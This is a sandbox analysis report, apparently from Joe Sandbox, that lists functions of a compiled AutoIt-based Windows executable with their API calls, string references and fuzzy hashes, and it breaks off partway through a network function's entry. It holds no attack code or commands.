Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: Value$Close$_wcslen$ConnectCreateRegistry
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 9721498-966354055
Opcode ID: 5719d0cd367573fdce70e72301642d1ddaef71f0678b485d2f20e188126c3abe
Instruction ID: cccddd89ead19d2d558fc3fd9555b5f7fdd30e9f87b69ea388c53272739c92f6
Opcode Fuzzy Hash: 5719d0cd367573fdce70e72301642d1ddaef71f0678b485d2f20e188126c3abe
Instruction Fuzzy Hash: 6B1281352042419FC714DF15C481A2AB7E5FF88319F04885EF88A9B3A2DB35FC42CB8A

Function 004F091E Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 004F09C6
_wcslen.LIBCMT ref: 004F0A01
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 004F0A54
_wcslen.LIBCMT ref: 004F0A8A
_wcslen.LIBCMT ref: 004F0B06
_wcslen.LIBCMT ref: 004F0B81

Part of subcall function 0047F9F2: _wcslen.LIBCMT ref: 0047F9FD

Part of subcall function 004C2BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 004C2BFA

Strings

GETSELECTED, xrefs: 004F0C4E
EXPAND, xrefs: 004F0BF8
COLLAPSE, xrefs: 004F0B01, 004F0B1C
SELECT, xrefs: 004F0D11
UNCHECK, xrefs: 004F0D3E
GETTEXT, xrefs: 004F0C97
GETITEMCOUNT, xrefs: 004F0C1E
EXISTS, xrefs: 004F0B7C, 004F0B97
CHECK, xrefs: 004F0A85, 004F0AA0
ISCHECKED, xrefs: 004F0CE1
GETTOTALCOUNT, xrefs: 004F09F2, 004F0A17

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 1103490817-4258414348
Opcode ID: e8b77076d1ab498ac19645e88f92ac3f6270980c1ff94086be4481fa196cfb8e
Instruction ID: 32ef3cac21bbb35b91a68815efe1caef68d6f0a4bb57a0aede11dadc3607cfaa
Opcode Fuzzy Hash: e8b77076d1ab498ac19645e88f92ac3f6270980c1ff94086be4481fa196cfb8e
Instruction Fuzzy Hash: 45E1CE752083059FC714DF25C45093AB7E1BFD8318B10895EF99A9B3A2D738ED46CB8A

Function 004EC998 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,004EB6AE,?,?), ref: 004EC9B5
_wcslen.LIBCMT ref: 004EC9F1
_wcslen.LIBCMT ref: 004ECA68
_wcslen.LIBCMT ref: 004ECA9E
_wcslen.LIBCMT ref: 004ECAF9
_wcslen.LIBCMT ref: 004ECB2F
_wcslen.LIBCMT ref: 004ECB7F

Strings

HKCC, xrefs: 004ECBAC
HKEY_CURRENT_USER, xrefs: 004ECBBD
HKEY_USERS, xrefs: 004ECBDF
HKEY_CLASSES_ROOT, xrefs: 004ECAF3, 004ECAF8
HKLM, xrefs: 004ECA98, 004ECA9D
HKCR, xrefs: 004ECB29, 004ECB2E
HKCU, xrefs: 004ECBCE
HKEY_CURRENT_CONFIG, xrefs: 004ECB79, 004ECB7E
HKU, xrefs: 004ECBF0
HKEY_LOCAL_MACHINE, xrefs: 004ECA62, 004ECA67

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 1256254125-909552448
Opcode ID: 68f94c78d34ba1ab82bcb1b59dddef09b0e11486d09cdf1821425c1ffc07bd57
Instruction ID: 8f7a096905c2a6f1ae935fe18d7513181908a10818d46f4817e13b87f1298abb
Opcode Fuzzy Hash: 68f94c78d34ba1ab82bcb1b59dddef09b0e11486d09cdf1821425c1ffc07bd57
Instruction Fuzzy Hash: FB7149726001AA8BCB20DE3ED8C16BF3395AF61755B24052BF86597384E63CDD47C398

Function 004F833C Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 004F835A
_wcslen.LIBCMT ref: 004F836E
_wcslen.LIBCMT ref: 004F8391
_wcslen.LIBCMT ref: 004F83B4
LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 004F83F2
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,004F5BF2), ref: 004F844E
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 004F8487
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 004F84CA
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 004F8501
FreeLibrary.KERNEL32(?), ref: 004F850D
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 004F851D
DestroyIcon.USER32(?,?,?,?,?,004F5BF2), ref: 004F852C
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 004F8549
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 004F8555

Strings

.dll, xrefs: 004F83AB
.icl, xrefs: 004F8368
.exe, xrefs: 004F8388

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
String ID: .dll$.exe$.icl
API String ID: 799131459-1154884017
Opcode ID: dc059a2f2864496d6609c94d45c97044cb47bfcdcd180277acfe98bf2bda73bd
Instruction ID: 35ee0736a5a739dac863b026872dd13422fee98db66bd22c3c10c602f2b09335
Opcode Fuzzy Hash: dc059a2f2864496d6609c94d45c97044cb47bfcdcd180277acfe98bf2bda73bd
Instruction Fuzzy Hash: 3461C07150021ABAEB14DF64CC81BBF77A8FF08715F10461EF915DA1D1EB78A990CBA8

Function 00467778 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 273COMMON

Download Yara Rule

Strings

#cs, xrefs: 00467873, 004678C5
", xrefs: 004A5153
#comments-start, xrefs: 0046785F, 004678B1
Unterminated group of comments, xrefs: 004A528C
#include, xrefs: 00467847
#ce, xrefs: 004678ED
', xrefs: 004A5169
#comments-end, xrefs: 004678D9
#notrayicon, xrefs: 004677E7
Bad directive syntax error, xrefs: 004A519A
#requireadmin, xrefs: 004677FF
Cannot parse #include, xrefs: 004A5279
#OnAutoItStartRegister, xrefs: 00467817
#pragma compile, xrefs: 004677D3
#include-once, xrefs: 0046782F

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID:
String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 0-1645009161
Opcode ID: cf12101addd034618fd10768a407ab7e675683583f4b0e66954094243de1e9f0
Instruction ID: d73a3926149da6b54f2b1496387112e4866dd8f2d99cda3bb957ed0a841319f5
Opcode Fuzzy Hash: cf12101addd034618fd10768a407ab7e675683583f4b0e66954094243de1e9f0
Instruction Fuzzy Hash: 3C81B471A04205ABDB20BB61DD42FBF3768AF15308F14442BF905AA296FB7C9905C79E

Function 004C5A1B Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 004C5A2E
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 004C5A40
SetWindowTextW.USER32(?,?), ref: 004C5A57
GetDlgItem.USER32(?,000003EA), ref: 004C5A6C
SetWindowTextW.USER32(00000000,?), ref: 004C5A72
GetDlgItem.USER32(?,000003E9), ref: 004C5A82
SetWindowTextW.USER32(00000000,?), ref: 004C5A88
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 004C5AA9
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 004C5AC3
GetWindowRect.USER32(?,?), ref: 004C5ACC
_wcslen.LIBCMT ref: 004C5B33
SetWindowTextW.USER32(?,?), ref: 004C5B6F
GetDesktopWindow.USER32 ref: 004C5B75
GetWindowRect.USER32(00000000), ref: 004C5B7C
MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 004C5BD3
GetClientRect.USER32(?,?), ref: 004C5BE0
PostMessageW.USER32(?,00000005,00000000,?), ref: 004C5C05
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 004C5C2F

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
String ID:
API String ID: 895679908-0
Opcode ID: 18199fc0b93df0dc493a2fed1a5ae5b70893245771ed9460007788106e969cfa
Instruction ID: bac8ebec53719d3399435828865ce0b232f1b3bdc8e05fd3397289c0cb97cb4d
Opcode Fuzzy Hash: 18199fc0b93df0dc493a2fed1a5ae5b70893245771ed9460007788106e969cfa
Instruction Fuzzy Hash: C0716C35900A099FDB20DFA9CE85FAEBBF5EB48704F10452DE142A26A0D779B954CB18

Function 004C30F7 Relevance: 26.6, APIs: 8, Strings: 7, Instructions: 400COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 004C318D
_wcslen.LIBCMT ref: 004C31F8

Strings

REGEXPCLASS, xrefs: 004C3255, 004C3266
TEXT, xrefs: 004C347C
CLASS, xrefs: 004C3188, 004C31A5
INSTANCE, xrefs: 004C3453
NAME, xrefs: 004C3335, 004C3346
CLASSNN, xrefs: 004C31F3, 004C3204
[R, xrefs: 004C339A

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: _wcslen
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT$[R
API String ID: 176396367-1700489126
Opcode ID: 5e809847217083d1b356a1054259b2e458db748aca59b48efd85fcaaf1809626
Instruction ID: 075f43f462614146ba8051cebb08ba0d92413fce4ab83a8a51495de59006a6dd
Opcode Fuzzy Hash: 5e809847217083d1b356a1054259b2e458db748aca59b48efd85fcaaf1809626
Instruction Fuzzy Hash: B0E1E336A00526ABCB58DF78C441FEEBBB0BF44715F54C15FE456A3280EB38AE458798

Function 004800C6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON

Download Yara Rule

APIs

__scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 004800C6

Part of subcall function 004800ED: InitializeCriticalSectionAndSpinCount.KERNEL32(0053070C,00000FA0,CAA402B8,?,?,?,?,004A23B3,000000FF), ref: 0048011C
Part of subcall function 004800ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,004A23B3,000000FF), ref: 00480127
Part of subcall function 004800ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,004A23B3,000000FF), ref: 00480138
Part of subcall function 004800ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 0048014E
Part of subcall function 004800ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 0048015C
Part of subcall function 004800ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 0048016A
Part of subcall function 004800ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00480195
Part of subcall function 004800ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 004801A0

___scrt_fastfail.LIBCMT ref: 004800E7

Part of subcall function 004800A3: __onexit.LIBCMT ref: 004800A9

Strings

WakeAllConditionVariable, xrefs: 00480162
SleepConditionVariableCS, xrefs: 00480154
api-ms-win-core-synch-l1-2-0.dll, xrefs: 00480122
kernel32.dll, xrefs: 00480133
InitializeConditionVariable, xrefs: 00480148

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 66158676-1714406822
Opcode ID: a78a433dd1befdb94b73a9097fc0caf019cac98a1e12a8b2d3a9a9cef9c536d2
Instruction ID: 0e0a1f9fbae3f0a75ceef3d0d623d975bd11563635e3ccb31f51b40d3d9aeca1
Opcode Fuzzy Hash: a78a433dd1befdb94b73a9097fc0caf019cac98a1e12a8b2d3a9a9cef9c536d2
Instruction Fuzzy Hash: 2F212932A507056BE7507B64AD49B7E3794EF05B61F10053BF901923D1DB6D9808CB9D

Function 004D44C0 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(00000000,00000000,004FCC08), ref: 004D4527
_wcslen.LIBCMT ref: 004D453B
_wcslen.LIBCMT ref: 004D4599
_wcslen.LIBCMT ref: 004D45F4
_wcslen.LIBCMT ref: 004D463F
_wcslen.LIBCMT ref: 004D46A7

Part of subcall function 0047F9F2: _wcslen.LIBCMT ref: 0047F9FD

GetDriveTypeW.KERNEL32(?,00526BF0,00000061), ref: 004D4743

Strings

all, xrefs: 004D4531, 004D4536
fixed, xrefs: 004D4635, 004D463A
unknown, xrefs: 004D4708
cdrom, xrefs: 004D458F, 004D4594
removable, xrefs: 004D45EA, 004D45EF
ramdisk, xrefs: 004D46F1
network, xrefs: 004D469D, 004D46A2

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: _wcslen$BuffCharDriveLowerType
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2055661098-1000479233
Opcode ID: 2e2acebaa32b351ed6cf9399acdba5cff01143f56bf89ffece07e2abcd838c70
Instruction ID: 2727f3185bf23b0b33a20192ec478e53714037061e7bc1b536821392fd6e834c
Opcode Fuzzy Hash: 2e2acebaa32b351ed6cf9399acdba5cff01143f56bf89ffece07e2abcd838c70
Instruction Fuzzy Hash: A9B11F316083029BC710DF28D8A0A6BB7E5AFE6724F10491FF496C3391E738D844CB9A

Function 004F911E Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00479BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00479BB2

DragQueryPoint.SHELL32(?,?), ref: 004F9147

Part of subcall function 004F7674: ClientToScreen.USER32(?,?), ref: 004F769A
Part of subcall function 004F7674: GetWindowRect.USER32(?,?), ref: 004F7710
Part of subcall function 004F7674: PtInRect.USER32(?,?,004F8B89), ref: 004F7720

SendMessageW.USER32(?,000000B0,?,?), ref: 004F91B0
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 004F91BB
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 004F91DE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 004F9225
SendMessageW.USER32(?,000000B0,?,?), ref: 004F923E
SendMessageW.USER32(?,000000B1,?,?), ref: 004F9255
SendMessageW.USER32(?,000000B1,?,?), ref: 004F9277
DragFinish.SHELL32(?), ref: 004F927E
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 004F9371

Strings

@GUI_DRAGFILE, xrefs: 004F9320
@GUI_DROPID, xrefs: 004F929E
@GUI_DRAGID, xrefs: 004F92E9
p#S, xrefs: 004F92BB

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$p#S
API String ID: 221274066-2183867411
Opcode ID: 1e4478ac4338f37676a7055addfa55b86e207a4c0495882b642c7055173960b6
Instruction ID: 191cc53cde6f9321b1bf9c67760c54a0930d175f6d2475ac7a60579953c1e13d
Opcode Fuzzy Hash: 1e4478ac4338f37676a7055addfa55b86e207a4c0495882b642c7055173960b6
Instruction Fuzzy Hash: D7617871108304AFD701EF61DD85EAFBBE8EF89354F00092EF595921A0EB749A49CB5A

Function 004EAFF9 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 004EB198
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 004EB1B0
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 004EB1D4
_wcslen.LIBCMT ref: 004EB200
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 004EB214
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 004EB236
_wcslen.LIBCMT ref: 004EB332

Part of subcall function 004D05A7: GetStdHandle.KERNEL32(000000F6), ref: 004D05C6

_wcslen.LIBCMT ref: 004EB34B
_wcslen.LIBCMT ref: 004EB366
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 004EB3B6
GetLastError.KERNEL32(00000000), ref: 004EB407
CloseHandle.KERNEL32(?), ref: 004EB439
CloseHandle.KERNEL32(00000000), ref: 004EB44A
CloseHandle.KERNEL32(00000000), ref: 004EB45C
CloseHandle.KERNEL32(00000000), ref: 004EB46E
CloseHandle.KERNEL32(?), ref: 004EB4E3

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
String ID:
API String ID: 2178637699-0
Opcode ID: 5c5c3f17e746c4974d58f75e3a7b9060f771c57f09f040a100314a8a2c64021e
Instruction ID: 812bd37de6e123fd41bf953f709fb25cf8090b12c11ba4e11ec9b1388a82685d
Opcode Fuzzy Hash: 5c5c3f17e746c4974d58f75e3a7b9060f771c57f09f040a100314a8a2c64021e
Instruction Fuzzy Hash: 89F18E315042409FC714EF26C891B6FB7E1EF85318F14855EF8999B2A2DB39EC44CB9A

Function 0046326F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(00531990), ref: 004A2F8D
GetMenuItemCount.USER32(00531990), ref: 004A303D
GetCursorPos.USER32(?), ref: 004A3081
SetForegroundWindow.USER32(00000000), ref: 004A308A
TrackPopupMenuEx.USER32(00531990,00000000,?,00000000,00000000,00000000), ref: 004A309D
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 004A30A9

Strings

0, xrefs: 0046327D

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
String ID: 0
API String ID: 36266755-4108050209
Opcode ID: ca5fae3dc4af54b95a831a0f46b1496aa93e830ec462c85cd5769831634263d5
Instruction ID: 9e5e9cc7e642d5c61a49acb94c18928631532365cb76934fd47d86e4629b963f
Opcode Fuzzy Hash: ca5fae3dc4af54b95a831a0f46b1496aa93e830ec462c85cd5769831634263d5
Instruction Fuzzy Hash: 61715B70644205BEEB208F28CD89FABBF64FF15324F204217F515662D0C7B9AD14E799

Function 004F6CD9 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?), ref: 004F6DEB

Part of subcall function 00466B57: _wcslen.LIBCMT ref: 00466B6A

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 004F6E5F
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 004F6E81
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 004F6E94
DestroyWindow.USER32(?), ref: 004F6EB5
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00460000,00000000), ref: 004F6EE4
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 004F6EFD
GetDesktopWindow.USER32 ref: 004F6F16
GetWindowRect.USER32(00000000), ref: 004F6F1D
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 004F6F35
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 004F6F4D

Part of subcall function 00479944: GetWindowLongW.USER32(?,000000EB), ref: 00479952

Strings

0, xrefs: 004F6D98
tooltips_class32, xrefs: 004F6E58, 004F6EDD

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
String ID: 0$tooltips_class32
API String ID: 2429346358-3619404913
Opcode ID: 620c266399a1be7832ce574ce943b4228f811b053349312585ee520752ee136a
Instruction ID: 792454a5bac273c8997be9493e2e5e787860e6c2ffd5a0964bc5efe3a8c8040c
Opcode Fuzzy Hash: 620c266399a1be7832ce574ce943b4228f811b053349312585ee520752ee136a
Instruction Fuzzy Hash: 2C716C71104248AFDB21CF28D844BBBBBE9FB89304F05041EF68987361C774AD1ADB1A

Function 004DC476 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 004DC4B0
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 004DC4C3
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 004DC4D7
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 004DC4F0
InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 004DC533
